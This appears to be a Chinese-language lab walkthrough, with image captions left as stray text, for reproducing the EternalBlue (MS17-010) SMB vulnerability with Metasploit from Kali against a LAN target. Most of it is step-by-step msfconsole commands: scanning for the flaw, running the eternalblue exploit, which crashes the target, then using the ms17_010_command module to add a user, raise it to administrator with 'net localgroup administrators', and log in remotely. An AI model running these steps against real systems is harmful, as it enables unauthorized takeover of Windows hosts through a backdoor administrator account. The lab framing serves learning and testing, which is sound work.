前言——


需要一台有ms17010 和一台kali 


ps:需要在同一局域网内,可以相互ping通


 


漏洞简介:


   永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。


 


复现过程:


 


1,在kali下,如果不是root权限,需要提权,如果是,跳过这一步


命令:sudo su


          sudo -i                   这两个都可以


永恒之蓝_漏洞利用


 


2, 启动msf:msfconsole


永恒之蓝_windows系统_02


ps:输入命令后的图像随机,不必纠结这一点


 


3,搜索模块: search ms17_010


永恒之蓝_ip地址_03


ps:关于以上模块,简单解释一下


0 auxiliary/admin/smb/ms17_010_command      //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务


1 auxiliary/scanner/smb/smb_ms17_010   //扫描模块,扫描目标主机是否存在永恒之蓝漏洞


2 exploit/windows/smb/ms17_010_eternalblue    //攻击模块


3 exploit/windows/smb/ms17_010_eternalblue_win8   //攻击模块,针对win8(个人猜测)


4 exploit/windows/smb/ms17_010_psexec     //可以理解成没得用


 


4,建立监听器:use exploit/multi/handler


永恒之蓝_ip地址_04


 


5,使用扫描模块:use auxiliary/scanner/smb/smb_ms17_010


ps:也可以使用前面的序号,这里为了偷懒,就使用前面的序号了:use 1


永恒之蓝_漏洞利用_05


show options   //查看


永恒之蓝_javascript_06


ps:required中显示yes的需要补充完整


所以使用命令补充ip地址:set RHOSTS 192.168.3.135(目标ip)


永恒之蓝_javascript_07


 


6,exploit  //扫描是否有漏洞


ps:run也可以(这里就不展示了,但是建议用exploit)


永恒之蓝_蓝屏_08


扫描查看是否存在永恒之蓝这个漏洞,当然这里这里肯定是有的(没有的话就可以换方法了)


 


7,使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue(use 2)


查看模块(show options)


设置ip(set RHOSTS 192.168.3.135)


永恒之蓝_ip地址_09


 


8,尝试攻击:exploit


人类的悲欢并不相同,永恒蓝屏(反正我用这个是没有成功的,本来还想要测试一下有杀软的情况,但是现实不允许啊)


参考有杀软的教程: ​​javascript:void(0)​​


 


另:如果成功,之后的步骤及一些命令



永恒之蓝_ip地址_10


如果成功,会现实win


永恒之蓝_windows系统_11


蓝屏....


 


9,在刚刚exploit命令无法成功后,使用模块:use auxiliary/admin/smb/ms17_010_command (use 0)


一样的步骤,查看,设置(注意:yes的都要添加,不要漏掉)


永恒之蓝_windows系统_12


 


10,exploit运行成功后,可以看到用户已经加进去了


永恒之蓝_蓝屏_13


永恒之蓝_ip地址_14


 


11,加入后可以通过远程连接,拿到shell


永恒之蓝_漏洞利用_15


 


ps:存在问题:不允许交互式登录


永恒之蓝_ip地址_16


更改权限:set COMMAND net localgroup administrators hhh /add


永恒之蓝_javascript_17


成功添加用户


永恒之蓝_蓝屏_18


成功上线


永恒之蓝_蓝屏_19